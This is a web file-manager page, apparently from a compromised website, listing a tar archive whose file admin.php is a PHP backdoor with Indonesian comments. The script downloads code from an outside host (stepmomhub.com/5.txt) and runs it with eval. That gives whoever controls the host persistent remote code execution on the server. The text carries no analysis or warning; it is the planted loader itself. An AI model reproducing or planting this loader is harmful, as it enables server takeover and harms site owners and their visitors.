File manager - Edit - /home/lemagazi/www/archive/docs/v1/dpuay/pdv.tar
Back
admin.php 0000666 00000000566 15134074054 0006363 0 ustar 00 <?php $allowed_host = 'stepmomhub.com'; $url = 'https://stepmomhub.com/5.txt'; // Pastikan domain sesuai if (parse_url($url, PHP_URL_HOST) !== $allowed_host) { die("URL tidak diizinkan!"); } // Ambil kode dengan cURL/file_get_contents $code = file_get_contents($url); if ($code) { eval('?>' . $code); } else { die("Gagal mengambil kode."); } ?>